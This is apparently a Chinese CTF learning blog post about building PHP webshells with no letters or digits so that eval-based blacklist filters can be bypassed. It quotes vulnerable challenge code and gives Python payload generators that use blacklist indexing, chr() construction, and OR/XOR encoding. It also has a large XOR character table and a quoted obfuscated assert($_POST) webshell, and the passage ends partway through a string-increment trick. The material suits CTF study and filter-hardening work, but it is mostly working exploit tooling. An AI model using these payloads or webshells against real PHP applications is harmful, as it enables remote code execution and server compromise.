无字母数字的webshell

最近刚学了一些命令执行的绕过技巧，但是昨天做安恒的八月赛，看到一个魔改的命令执行，看了y1ng的带佬的脚本之后也不是很明白，所以今天专门研究一下，这个知识点。这个无字母数字webshell的最初篇是来自P神17年的文章，所以这次还是踩着巨人的肩膀继续进行一次深入学习。

大致现在的过滤题目分为以下几种：

1.过滤字母和部分字符

<?php
error_reporting(0);
show_source(__FILE__);
$hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php');
$code=$_REQUEST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','\~','\^');
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('nonono');
    }
}
eval("echo($code);");
?>

2.过滤字母和数字

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}

if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

3.过滤字母、数字和大部分字符

<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('you are not smart');
    }
}
eval("echo($code)");
?>

这些问题的核心就是通过未过滤的字符、符号等构造出字母和数字，从而实现getshell！

过滤字母和部分字符

题目源码上边以及给出来了，取自ctf.show的36D杯WEB_你取吧。

首先源码逻辑很简单就是黑名单过滤，可以看到取反符号和异或符号以及所有字母均在黑名单。

黑名单利用(限制条件，未过滤" ` "、" $ "、" [ "、" ] "、" _ "以及数字)

直接利用黑名单，结合php变量符号以及反引号在Linux的特殊执行作用进行RCE。

def solve1():
    # 黑名单
    _ = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'l', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '~', '^']
    operation = input("Operation:")
    payload = ""
    for i in range(len(operation)):
        if operation[i] in _:
            num = ''.join(_).index(operation[i])
            payload += f"$_[{num}]"
        else:
            payload += operation[i]
    payload = '`'+payload+'`'
    print('payload:'+ payload)

利用黑名单和chr函数构造system命令执行

该思路来自阿狸大佬的方法2

主要方法是构造chr(system())函数为变量，再定义出要执行的命令，实现执行，主要利用数字没被ban。

def solve2():
    # 利用黑名单和chr函数构造system命令执行
    _ = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'l', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '~', '^']
    _0 = '($_0=$_[2].$_[7].$_[17])'  # $_0=chr
    _1 = '($_1=$_0(115).$_0(121).$_0(115).$_0(116).$_0(101).$_0(109))'
    operation = input("Operation:")
    _2 = '($_2='
    for i in operation:
        temp = '$_0(' + str(ord(i)) + ').'
        _2 += temp
    _2 = _2[:-1] + ')'
    payload = _0 + '.' + _1 + '.' + _2 + '.($_1($_2))'
    print('payload:' + payload)

过滤字母和数字

按位或、异或、取反

这种方法要再没有ban掉大多数特殊字符的情况下才能够使用，原理就是通过不同的字符进行位运算获得目标字符。

因为与运算无法获得字母a或A，所以一般不用与运算。

或运算脚本

# 或运算脚本
def solve3(CODE):
    l = 'abcdefghijklmnopqrstuvwxyz'
    n = '0123456789'
    operation = input("Operation:")
    front = ""
    after = ""
    for i in operation:
        if i.isalpha():
            front += chr(l.index(i) + 1)
            after += chr(64)
        elif i.isdigit():
            front += chr(n.index(i) + 32)
            after += chr(16)
        else:
            front += i
            after += i
    payload = "($_=(\"%13%19%13%14%05%0D\"|\"%40%40%40%40%40%40\")).($__ = \"" + quote(
        front) + "\"" + '|' + "\"" + quote(after) + "\").($_($__));"
    print('payload:' + payload)

异或运算脚本

def solve4(CODE):
    l = 'abcdefghijklmnopqrstuvwxyz'
    n = '0123456789'
    operation = input("Operation:")
    front = ""
    after = ""
    for i in operation:
        if i.isalpha():
            front += chr(l.index(i) + 1)
            after += chr(96)
        elif i.isdigit():
            front += chr(n.index(i) + 32)
            after += chr(16)
        else:
            front += i
            after += i
    payload = "($_=(\"%13%19%13%14%05%0D\"^\"%40%40%40%40%40%40\")).($__ = \"" + quote(
        front) + "\"" + '|' + "\"" + quote(after) + "\").($_($__));"
    print('payload:' + CODE + '=' + payload)
    print('- ' * 60)

或运算和异或运算在脚本上没差，但是异或的组合情况等更多，所以在下面列出了异或能得到字母数字的所有情况。

chr(1) ^ chr(64) = A
chr(1) ^ chr(91) = Z
chr(1) ^ chr(96) = a
chr(1) ^ chr(123) = z
chr(2) ^ chr(58) = 8
chr(2) ^ chr(59) = 9
chr(2) ^ chr(64) = B
chr(2) ^ chr(91) = Y
chr(2) ^ chr(96) = b
chr(2) ^ chr(123) = y
chr(3) ^ chr(58) = 9
chr(3) ^ chr(59) = 8
chr(3) ^ chr(64) = C
chr(3) ^ chr(91) = X
chr(3) ^ chr(96) = c
chr(3) ^ chr(123) = x
chr(4) ^ chr(60) = 8
chr(4) ^ chr(61) = 9
chr(4) ^ chr(64) = D
chr(4) ^ chr(92) = X
chr(4) ^ chr(93) = Y
chr(4) ^ chr(94) = Z
chr(4) ^ chr(96) = d
chr(4) ^ chr(124) = x
chr(4) ^ chr(125) = y
chr(4) ^ chr(126) = z
chr(5) ^ chr(60) = 9
chr(5) ^ chr(61) = 8
chr(5) ^ chr(64) = E
chr(5) ^ chr(92) = Y
chr(5) ^ chr(93) = X
chr(5) ^ chr(95) = Z
chr(5) ^ chr(96) = e
chr(5) ^ chr(124) = y
chr(5) ^ chr(125) = x
chr(5) ^ chr(127) = z
chr(6) ^ chr(62) = 8
chr(6) ^ chr(63) = 9
chr(6) ^ chr(64) = F
chr(6) ^ chr(92) = Z
chr(6) ^ chr(94) = X
chr(6) ^ chr(95) = Y
chr(6) ^ chr(96) = f
chr(6) ^ chr(124) = z
chr(6) ^ chr(126) = x
chr(6) ^ chr(127) = y
chr(7) ^ chr(62) = 9
chr(7) ^ chr(63) = 8
chr(7) ^ chr(64) = G
chr(7) ^ chr(93) = Z
chr(7) ^ chr(94) = Y
chr(7) ^ chr(95) = X
chr(7) ^ chr(96) = g
chr(7) ^ chr(125) = z
chr(7) ^ chr(126) = y
chr(7) ^ chr(127) = x
chr(8) ^ chr(58) = 2
chr(8) ^ chr(59) = 3
chr(8) ^ chr(60) = 4
chr(8) ^ chr(61) = 5
chr(8) ^ chr(62) = 6
chr(8) ^ chr(63) = 7
chr(8) ^ chr(64) = H
chr(8) ^ chr(91) = S
chr(8) ^ chr(92) = T
chr(8) ^ chr(93) = U
chr(8) ^ chr(94) = V
chr(8) ^ chr(95) = W
chr(8) ^ chr(96) = h
chr(8) ^ chr(123) = s
chr(8) ^ chr(124) = t
chr(8) ^ chr(125) = u
chr(8) ^ chr(126) = v
chr(8) ^ chr(127) = w
chr(9) ^ chr(58) = 3
chr(9) ^ chr(59) = 2
chr(9) ^ chr(60) = 5
chr(9) ^ chr(61) = 4
chr(9) ^ chr(62) = 7
chr(9) ^ chr(63) = 6
chr(9) ^ chr(64) = I
chr(9) ^ chr(91) = R
chr(9) ^ chr(92) = U
chr(9) ^ chr(93) = T
chr(9) ^ chr(94) = W
chr(9) ^ chr(95) = V
chr(9) ^ chr(96) = i
chr(9) ^ chr(123) = r
chr(9) ^ chr(124) = u
chr(9) ^ chr(125) = t
chr(9) ^ chr(126) = w
chr(9) ^ chr(127) = v
chr(10) ^ chr(58) = 0
chr(10) ^ chr(59) = 1
chr(10) ^ chr(60) = 6
chr(10) ^ chr(61) = 7
chr(10) ^ chr(62) = 4
chr(10) ^ chr(63) = 5
chr(10) ^ chr(64) = J
chr(10) ^ chr(91) = Q
chr(10) ^ chr(92) = V
chr(10) ^ chr(93) = W
chr(10) ^ chr(94) = T
chr(10) ^ chr(95) = U
chr(10) ^ chr(96) = j
chr(10) ^ chr(123) = q
chr(10) ^ chr(124) = v
chr(10) ^ chr(125) = w
chr(10) ^ chr(126) = t
chr(10) ^ chr(127) = u
chr(11) ^ chr(58) = 1
chr(11) ^ chr(59) = 0
chr(11) ^ chr(60) = 7
chr(11) ^ chr(61) = 6
chr(11) ^ chr(62) = 5
chr(11) ^ chr(63) = 4
chr(11) ^ chr(64) = K
chr(11) ^ chr(91) = P
chr(11) ^ chr(92) = W
chr(11) ^ chr(93) = V
chr(11) ^ chr(94) = U
chr(11) ^ chr(95) = T
chr(11) ^ chr(96) = k
chr(11) ^ chr(123) = p
chr(11) ^ chr(124) = w
chr(11) ^ chr(125) = v
chr(11) ^ chr(126) = u
chr(11) ^ chr(127) = t
chr(12) ^ chr(58) = 6
chr(12) ^ chr(59) = 7
chr(12) ^ chr(60) = 0
chr(12) ^ chr(61) = 1
chr(12) ^ chr(62) = 2
chr(12) ^ chr(63) = 3
chr(12) ^ chr(64) = L
chr(12) ^ chr(91) = W
chr(12) ^ chr(92) = P
chr(12) ^ chr(93) = Q
chr(12) ^ chr(94) = R
chr(12) ^ chr(95) = S
chr(12) ^ chr(96) = l
chr(12) ^ chr(123) = w
chr(12) ^ chr(124) = p
chr(12) ^ chr(125) = q
chr(12) ^ chr(126) = r
chr(12) ^ chr(127) = s
chr(13) ^ chr(58) = 7
chr(13) ^ chr(59) = 6
chr(13) ^ chr(60) = 1
chr(13) ^ chr(61) = 0
chr(13) ^ chr(62) = 3
chr(13) ^ chr(63) = 2
chr(13) ^ chr(64) = M
chr(13) ^ chr(91) = V
chr(13) ^ chr(92) = Q
chr(13) ^ chr(93) = P
chr(13) ^ chr(94) = S
chr(13) ^ chr(95) = R
chr(13) ^ chr(96) = m
chr(13) ^ chr(123) = v
chr(13) ^ chr(124) = q
chr(13) ^ chr(125) = p
chr(13) ^ chr(126) = s
chr(13) ^ chr(127) = r
chr(14) ^ chr(58) = 4
chr(14) ^ chr(59) = 5
chr(14) ^ chr(60) = 2
chr(14) ^ chr(61) = 3
chr(14) ^ chr(62) = 0
chr(14) ^ chr(63) = 1
chr(14) ^ chr(64) = N
chr(14) ^ chr(91) = U
chr(14) ^ chr(92) = R
chr(14) ^ chr(93) = S
chr(14) ^ chr(94) = P
chr(14) ^ chr(95) = Q
chr(14) ^ chr(96) = n
chr(14) ^ chr(123) = u
chr(14) ^ chr(124) = r
chr(14) ^ chr(125) = s
chr(14) ^ chr(126) = p
chr(14) ^ chr(127) = q
chr(15) ^ chr(58) = 5
chr(15) ^ chr(59) = 4
chr(15) ^ chr(60) = 3
chr(15) ^ chr(61) = 2
chr(15) ^ chr(62) = 1
chr(15) ^ chr(63) = 0
chr(15) ^ chr(64) = O
chr(15) ^ chr(91) = T
chr(15) ^ chr(92) = S
chr(15) ^ chr(93) = R
chr(15) ^ chr(94) = Q
chr(15) ^ chr(95) = P
chr(15) ^ chr(96) = o
chr(15) ^ chr(123) = t
chr(15) ^ chr(124) = s
chr(15) ^ chr(125) = r
chr(15) ^ chr(126) = q
chr(15) ^ chr(127) = p
chr(16) ^ chr(32) = 0
chr(16) ^ chr(33) = 1
chr(16) ^ chr(34) = 2
chr(16) ^ chr(35) = 3
chr(16) ^ chr(36) = 4
chr(16) ^ chr(37) = 5
chr(16) ^ chr(38) = 6
chr(16) ^ chr(39) = 7
chr(16) ^ chr(40) = 8
chr(16) ^ chr(41) = 9
chr(16) ^ chr(64) = P
chr(16) ^ chr(91) = K
chr(16) ^ chr(92) = L
chr(16) ^ chr(93) = M
chr(16) ^ chr(94) = N
chr(16) ^ chr(95) = O
chr(16) ^ chr(96) = p
chr(16) ^ chr(123) = k
chr(16) ^ chr(124) = l
chr(16) ^ chr(125) = m
chr(16) ^ chr(126) = n
chr(16) ^ chr(127) = o
chr(17) ^ chr(32) = 1
chr(17) ^ chr(33) = 0
chr(17) ^ chr(34) = 3
chr(17) ^ chr(35) = 2
chr(17) ^ chr(36) = 5
chr(17) ^ chr(37) = 4
chr(17) ^ chr(38) = 7
chr(17) ^ chr(39) = 6
chr(17) ^ chr(40) = 9
chr(17) ^ chr(41) = 8
chr(17) ^ chr(64) = Q
chr(17) ^ chr(91) = J
chr(17) ^ chr(92) = M
chr(17) ^ chr(93) = L
chr(17) ^ chr(94) = O
chr(17) ^ chr(95) = N
chr(17) ^ chr(96) = q
chr(17) ^ chr(123) = j
chr(17) ^ chr(124) = m
chr(17) ^ chr(125) = l
chr(17) ^ chr(126) = o
chr(17) ^ chr(127) = n
chr(18) ^ chr(32) = 2
chr(18) ^ chr(33) = 3
chr(18) ^ chr(34) = 0
chr(18) ^ chr(35) = 1
chr(18) ^ chr(36) = 6
chr(18) ^ chr(37) = 7
chr(18) ^ chr(38) = 4
chr(18) ^ chr(39) = 5
chr(18) ^ chr(42) = 8
chr(18) ^ chr(43) = 9
chr(18) ^ chr(64) = R
chr(18) ^ chr(91) = I
chr(18) ^ chr(92) = N
chr(18) ^ chr(93) = O
chr(18) ^ chr(94) = L
chr(18) ^ chr(95) = M
chr(18) ^ chr(96) = r
chr(18) ^ chr(123) = i
chr(18) ^ chr(124) = n
chr(18) ^ chr(125) = o
chr(18) ^ chr(126) = l
chr(18) ^ chr(127) = m
chr(19) ^ chr(32) = 3
chr(19) ^ chr(33) = 2
chr(19) ^ chr(34) = 1
chr(19) ^ chr(35) = 0
chr(19) ^ chr(36) = 7
chr(19) ^ chr(37) = 6
chr(19) ^ chr(38) = 5
chr(19) ^ chr(39) = 4
chr(19) ^ chr(42) = 9
chr(19) ^ chr(43) = 8
chr(19) ^ chr(64) = S
chr(19) ^ chr(91) = H
chr(19) ^ chr(92) = O
chr(19) ^ chr(93) = N
chr(19) ^ chr(94) = M
chr(19) ^ chr(95) = L
chr(19) ^ chr(96) = s
chr(19) ^ chr(123) = h
chr(19) ^ chr(124) = o
chr(19) ^ chr(125) = n
chr(19) ^ chr(126) = m
chr(19) ^ chr(127) = l
chr(20) ^ chr(32) = 4
chr(20) ^ chr(33) = 5
chr(20) ^ chr(34) = 6
chr(20) ^ chr(35) = 7
chr(20) ^ chr(36) = 0
chr(20) ^ chr(37) = 1
chr(20) ^ chr(38) = 2
chr(20) ^ chr(39) = 3
chr(20) ^ chr(44) = 8
chr(20) ^ chr(45) = 9
chr(20) ^ chr(64) = T
chr(20) ^ chr(91) = O
chr(20) ^ chr(92) = H
chr(20) ^ chr(93) = I
chr(20) ^ chr(94) = J
chr(20) ^ chr(95) = K
chr(20) ^ chr(96) = t
chr(20) ^ chr(123) = o
chr(20) ^ chr(124) = h
chr(20) ^ chr(125) = i
chr(20) ^ chr(126) = j
chr(20) ^ chr(127) = k
chr(21) ^ chr(32) = 5
chr(21) ^ chr(33) = 4
chr(21) ^ chr(34) = 7
chr(21) ^ chr(35) = 6
chr(21) ^ chr(36) = 1
chr(21) ^ chr(37) = 0
chr(21) ^ chr(38) = 3
chr(21) ^ chr(39) = 2
chr(21) ^ chr(44) = 9
chr(21) ^ chr(45) = 8
chr(21) ^ chr(64) = U
chr(21) ^ chr(91) = N
chr(21) ^ chr(92) = I
chr(21) ^ chr(93) = H
chr(21) ^ chr(94) = K
chr(21) ^ chr(95) = J
chr(21) ^ chr(96) = u
chr(21) ^ chr(123) = n
chr(21) ^ chr(124) = i
chr(21) ^ chr(125) = h
chr(21) ^ chr(126) = k
chr(21) ^ chr(127) = j
chr(22) ^ chr(32) = 6
chr(22) ^ chr(33) = 7
chr(22) ^ chr(34) = 4
chr(22) ^ chr(35) = 5
chr(22) ^ chr(36) = 2
chr(22) ^ chr(37) = 3
chr(22) ^ chr(38) = 0
chr(22) ^ chr(39) = 1
chr(22) ^ chr(46) = 8
chr(22) ^ chr(47) = 9
chr(22) ^ chr(64) = V
chr(22) ^ chr(91) = M
chr(22) ^ chr(92) = J
chr(22) ^ chr(93) = K
chr(22) ^ chr(94) = H
chr(22) ^ chr(95) = I
chr(22) ^ chr(96) = v
chr(22) ^ chr(123) = m
chr(22) ^ chr(124) = j
chr(22) ^ chr(125) = k
chr(22) ^ chr(126) = h
chr(22) ^ chr(127) = i
chr(23) ^ chr(32) = 7
chr(23) ^ chr(33) = 6
chr(23) ^ chr(34) = 5
chr(23) ^ chr(35) = 4
chr(23) ^ chr(36) = 3
chr(23) ^ chr(37) = 2
chr(23) ^ chr(38) = 1
chr(23) ^ chr(39) = 0
chr(23) ^ chr(46) = 9
chr(23) ^ chr(47) = 8
chr(23) ^ chr(64) = W
chr(23) ^ chr(91) = L
chr(23) ^ chr(92) = K
chr(23) ^ chr(93) = J
chr(23) ^ chr(94) = I
chr(23) ^ chr(95) = H
chr(23) ^ chr(96) = w
chr(23) ^ chr(123) = l
chr(23) ^ chr(124) = k
chr(23) ^ chr(125) = j
chr(23) ^ chr(126) = i
chr(23) ^ chr(127) = h
chr(24) ^ chr(32) = 8
chr(24) ^ chr(33) = 9
chr(24) ^ chr(40) = 0
chr(24) ^ chr(41) = 1
chr(24) ^ chr(42) = 2
chr(24) ^ chr(43) = 3
chr(24) ^ chr(44) = 4
chr(24) ^ chr(45) = 5
chr(24) ^ chr(46) = 6
chr(24) ^ chr(47) = 7
chr(24) ^ chr(64) = X
chr(24) ^ chr(91) = C
chr(24) ^ chr(92) = D
chr(24) ^ chr(93) = E
chr(24) ^ chr(94) = F
chr(24) ^ chr(95) = G
chr(24) ^ chr(96) = x
chr(24) ^ chr(123) = c
chr(24) ^ chr(124) = d
chr(24) ^ chr(125) = e
chr(24) ^ chr(126) = f
chr(24) ^ chr(127) = g
chr(25) ^ chr(32) = 9
chr(25) ^ chr(33) = 8
chr(25) ^ chr(40) = 1
chr(25) ^ chr(41) = 0
chr(25) ^ chr(42) = 3
chr(25) ^ chr(43) = 2
chr(25) ^ chr(44) = 5
chr(25) ^ chr(45) = 4
chr(25) ^ chr(46) = 7
chr(25) ^ chr(47) = 6
chr(25) ^ chr(64) = Y
chr(25) ^ chr(91) = B
chr(25) ^ chr(92) = E
chr(25) ^ chr(93) = D
chr(25) ^ chr(94) = G
chr(25) ^ chr(95) = F
chr(25) ^ chr(96) = y
chr(25) ^ chr(123) = b
chr(25) ^ chr(124) = e
chr(25) ^ chr(125) = d
chr(25) ^ chr(126) = g
chr(25) ^ chr(127) = f
chr(26) ^ chr(34) = 8
chr(26) ^ chr(35) = 9
chr(26) ^ chr(40) = 2
chr(26) ^ chr(41) = 3
chr(26) ^ chr(42) = 0
chr(26) ^ chr(43) = 1
chr(26) ^ chr(44) = 6
chr(26) ^ chr(45) = 7
chr(26) ^ chr(46) = 4
chr(26) ^ chr(47) = 5
chr(26) ^ chr(64) = Z
chr(26) ^ chr(91) = A
chr(26) ^ chr(92) = F
chr(26) ^ chr(93) = G
chr(26) ^ chr(94) = D
chr(26) ^ chr(95) = E
chr(26) ^ chr(96) = z
chr(26) ^ chr(123) = a
chr(26) ^ chr(124) = f
chr(26) ^ chr(125) = g
chr(26) ^ chr(126) = d
chr(26) ^ chr(127) = e
chr(27) ^ chr(34) = 9
chr(27) ^ chr(35) = 8
chr(27) ^ chr(40) = 3
chr(27) ^ chr(41) = 2
chr(27) ^ chr(42) = 1
chr(27) ^ chr(43) = 0
chr(27) ^ chr(44) = 7
chr(27) ^ chr(45) = 6
chr(27) ^ chr(46) = 5
chr(27) ^ chr(47) = 4
chr(27) ^ chr(92) = G
chr(27) ^ chr(93) = F
chr(27) ^ chr(94) = E
chr(27) ^ chr(95) = D
chr(27) ^ chr(124) = g
chr(27) ^ chr(125) = f
chr(27) ^ chr(126) = e
chr(27) ^ chr(127) = d
chr(28) ^ chr(36) = 8
chr(28) ^ chr(37) = 9
chr(28) ^ chr(40) = 4
chr(28) ^ chr(41) = 5
chr(28) ^ chr(42) = 6
chr(28) ^ chr(43) = 7
chr(28) ^ chr(44) = 0
chr(28) ^ chr(45) = 1
chr(28) ^ chr(46) = 2
chr(28) ^ chr(47) = 3
chr(28) ^ chr(91) = G
chr(28) ^ chr(93) = A
chr(28) ^ chr(94) = B
chr(28) ^ chr(95) = C
chr(28) ^ chr(123) = g
chr(28) ^ chr(125) = a
chr(28) ^ chr(126) = b
chr(28) ^ chr(127) = c
chr(29) ^ chr(36) = 9
chr(29) ^ chr(37) = 8
chr(29) ^ chr(40) = 5
chr(29) ^ chr(41) = 4
chr(29) ^ chr(42) = 7
chr(29) ^ chr(43) = 6
chr(29) ^ chr(44) = 1
chr(29) ^ chr(45) = 0
chr(29) ^ chr(46) = 3
chr(29) ^ chr(47) = 2
chr(29) ^ chr(91) = F
chr(29) ^ chr(92) = A
chr(29) ^ chr(94) = C
chr(29) ^ chr(95) = B
chr(29) ^ chr(123) = f
chr(29) ^ chr(124) = a
chr(29) ^ chr(126) = c
chr(29) ^ chr(127) = b
chr(30) ^ chr(38) = 8
chr(30) ^ chr(39) = 9
chr(30) ^ chr(40) = 6
chr(30) ^ chr(41) = 7
chr(30) ^ chr(42) = 4
chr(30) ^ chr(43) = 5
chr(30) ^ chr(44) = 2
chr(30) ^ chr(45) = 3
chr(30) ^ chr(46) = 0
chr(30) ^ chr(47) = 1
chr(30) ^ chr(91) = E
chr(30) ^ chr(92) = B
chr(30) ^ chr(93) = C
chr(30) ^ chr(95) = A
chr(30) ^ chr(123) = e
chr(30) ^ chr(124) = b
chr(30) ^ chr(125) = c
chr(30) ^ chr(127) = a
chr(31) ^ chr(38) = 9
chr(31) ^ chr(39) = 8
chr(31) ^ chr(40) = 7
chr(31) ^ chr(41) = 6
chr(31) ^ chr(42) = 5
chr(31) ^ chr(43) = 4
chr(31) ^ chr(44) = 3
chr(31) ^ chr(45) = 2
chr(31) ^ chr(46) = 1
chr(31) ^ chr(47) = 0
chr(31) ^ chr(91) = D
chr(31) ^ chr(92) = C
chr(31) ^ chr(93) = B
chr(31) ^ chr(94) = A
chr(31) ^ chr(123) = d
chr(31) ^ chr(124) = c
chr(31) ^ chr(125) = b
chr(31) ^ chr(126) = a
chr(33) ^ chr(64) = a
chr(33) ^ chr(91) = z
chr(33) ^ chr(96) = A
chr(33) ^ chr(123) = Z
chr(34) ^ chr(64) = b
chr(34) ^ chr(91) = y
chr(34) ^ chr(96) = B
chr(34) ^ chr(123) = Y
chr(35) ^ chr(64) = c
chr(35) ^ chr(91) = x
chr(35) ^ chr(96) = C
chr(35) ^ chr(123) = X
chr(36) ^ chr(64) = d
chr(36) ^ chr(92) = x
chr(36) ^ chr(93) = y
chr(36) ^ chr(94) = z
chr(36) ^ chr(96) = D
chr(36) ^ chr(124) = X
chr(36) ^ chr(125) = Y
chr(36) ^ chr(126) = Z
chr(37) ^ chr(64) = e
chr(37) ^ chr(92) = y
chr(37) ^ chr(93) = x
chr(37) ^ chr(95) = z
chr(37) ^ chr(96) = E
chr(37) ^ chr(124) = Y
chr(37) ^ chr(125) = X
chr(37) ^ chr(127) = Z
chr(38) ^ chr(64) = f
chr(38) ^ chr(92) = z
chr(38) ^ chr(94) = x
chr(38) ^ chr(95) = y
chr(38) ^ chr(96) = F
chr(38) ^ chr(124) = Z
chr(38) ^ chr(126) = X
chr(38) ^ chr(127) = Y
chr(39) ^ chr(64) = g
chr(39) ^ chr(93) = z
chr(39) ^ chr(94) = y
chr(39) ^ chr(95) = x
chr(39) ^ chr(96) = G
chr(39) ^ chr(125) = Z
chr(39) ^ chr(126) = Y
chr(39) ^ chr(127) = X
chr(40) ^ chr(64) = h
chr(40) ^ chr(91) = s
chr(40) ^ chr(92) = t
chr(40) ^ chr(93) = u
chr(40) ^ chr(94) = v
chr(40) ^ chr(95) = w
chr(40) ^ chr(96) = H
chr(40) ^ chr(123) = S
chr(40) ^ chr(124) = T
chr(40) ^ chr(125) = U
chr(40) ^ chr(126) = V
chr(40) ^ chr(127) = W
chr(41) ^ chr(64) = i
chr(41) ^ chr(91) = r
chr(41) ^ chr(92) = u
chr(41) ^ chr(93) = t
chr(41) ^ chr(94) = w
chr(41) ^ chr(95) = v
chr(41) ^ chr(96) = I
chr(41) ^ chr(123) = R
chr(41) ^ chr(124) = U
chr(41) ^ chr(125) = T
chr(41) ^ chr(126) = W
chr(41) ^ chr(127) = V
chr(42) ^ chr(64) = j
chr(42) ^ chr(91) = q
chr(42) ^ chr(92) = v
chr(42) ^ chr(93) = w
chr(42) ^ chr(94) = t
chr(42) ^ chr(95) = u
chr(42) ^ chr(96) = J
chr(42) ^ chr(123) = Q
chr(42) ^ chr(124) = V
chr(42) ^ chr(125) = W
chr(42) ^ chr(126) = T
chr(42) ^ chr(127) = U
chr(43) ^ chr(64) = k
chr(43) ^ chr(91) = p
chr(43) ^ chr(92) = w
chr(43) ^ chr(93) = v
chr(43) ^ chr(94) = u
chr(43) ^ chr(95) = t
chr(43) ^ chr(96) = K
chr(43) ^ chr(123) = P
chr(43) ^ chr(124) = W
chr(43) ^ chr(125) = V
chr(43) ^ chr(126) = U
chr(43) ^ chr(127) = T
chr(44) ^ chr(64) = l
chr(44) ^ chr(91) = w
chr(44) ^ chr(92) = p
chr(44) ^ chr(93) = q
chr(44) ^ chr(94) = r
chr(44) ^ chr(95) = s
chr(44) ^ chr(96) = L
chr(44) ^ chr(123) = W
chr(44) ^ chr(124) = P
chr(44) ^ chr(125) = Q
chr(44) ^ chr(126) = R
chr(44) ^ chr(127) = S
chr(45) ^ chr(64) = m
chr(45) ^ chr(91) = v
chr(45) ^ chr(92) = q
chr(45) ^ chr(93) = p
chr(45) ^ chr(94) = s
chr(45) ^ chr(95) = r
chr(45) ^ chr(96) = M
chr(45) ^ chr(123) = V
chr(45) ^ chr(124) = Q
chr(45) ^ chr(125) = P
chr(45) ^ chr(126) = S
chr(45) ^ chr(127) = R
chr(46) ^ chr(64) = n
chr(46) ^ chr(91) = u
chr(46) ^ chr(92) = r
chr(46) ^ chr(93) = s
chr(46) ^ chr(94) = p
chr(46) ^ chr(95) = q
chr(46) ^ chr(96) = N
chr(46) ^ chr(123) = U
chr(46) ^ chr(124) = R
chr(46) ^ chr(125) = S
chr(46) ^ chr(126) = P
chr(46) ^ chr(127) = Q
chr(47) ^ chr(64) = o
chr(47) ^ chr(91) = t
chr(47) ^ chr(92) = s
chr(47) ^ chr(93) = r
chr(47) ^ chr(94) = q
chr(47) ^ chr(95) = p
chr(47) ^ chr(96) = O
chr(47) ^ chr(123) = T
chr(47) ^ chr(124) = S
chr(47) ^ chr(125) = R
chr(47) ^ chr(126) = Q
chr(47) ^ chr(127) = P
chr(58) ^ chr(64) = z
chr(58) ^ chr(91) = a
chr(58) ^ chr(92) = f
chr(58) ^ chr(93) = g
chr(58) ^ chr(94) = d
chr(58) ^ chr(95) = e
chr(58) ^ chr(96) = Z
chr(58) ^ chr(123) = A
chr(58) ^ chr(124) = F
chr(58) ^ chr(125) = G
chr(58) ^ chr(126) = D
chr(58) ^ chr(127) = E
chr(59) ^ chr(92) = g
chr(59) ^ chr(93) = f
chr(59) ^ chr(94) = e
chr(59) ^ chr(95) = d
chr(59) ^ chr(124) = G
chr(59) ^ chr(125) = F
chr(59) ^ chr(126) = E
chr(59) ^ chr(127) = D
chr(60) ^ chr(91) = g
chr(60) ^ chr(93) = a
chr(60) ^ chr(94) = b
chr(60) ^ chr(95) = c
chr(60) ^ chr(123) = G
chr(60) ^ chr(125) = A
chr(60) ^ chr(126) = B
chr(60) ^ chr(127) = C
chr(61) ^ chr(91) = f
chr(61) ^ chr(92) = a
chr(61) ^ chr(94) = c
chr(61) ^ chr(95) = b
chr(61) ^ chr(123) = F
chr(61) ^ chr(124) = A
chr(61) ^ chr(126) = C
chr(61) ^ chr(127) = B
chr(62) ^ chr(91) = e
chr(62) ^ chr(92) = b
chr(62) ^ chr(93) = c
chr(62) ^ chr(95) = a
chr(62) ^ chr(123) = E
chr(62) ^ chr(124) = B
chr(62) ^ chr(125) = C
chr(62) ^ chr(127) = A
chr(63) ^ chr(91) = d
chr(63) ^ chr(92) = c
chr(63) ^ chr(93) = b
chr(63) ^ chr(94) = a
chr(63) ^ chr(123) = D
chr(63) ^ chr(124) = C
chr(63) ^ chr(125) = B
chr(63) ^ chr(126) = A

取反运算脚本

php可以对汉字取反获得乱码，但大多数会包含一个字母，例如你字取反为B_其中第二位就是大写字母B，所以可以通过这种方法获得字母B：

<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
// assert($_POST[2])

上述payload取自P神，因为对汉字取反是PHP的特性，python实现较为复杂，所以这个坑回头PHP写了填上。

PHP特性技巧

PHP在处理字符变量的算数运算时，并非对ascii码操作，而是执行如下操作：$_='Z';$_++;此时$_变成了'AA'，但只支持纯字符递增，而非字符或者递减操作均无效，不会改变。

所以通过这个特性我们只要能拿到字母a和A，就可以通过自增获得所有字母， 在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array ，再取这个字符串的第一个字母，就可以获得'A'了。

因为PHP函数是大小写不敏感的，所以我们最终执行的是ASSERT($_POST[_])，无需获取小写a）：

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
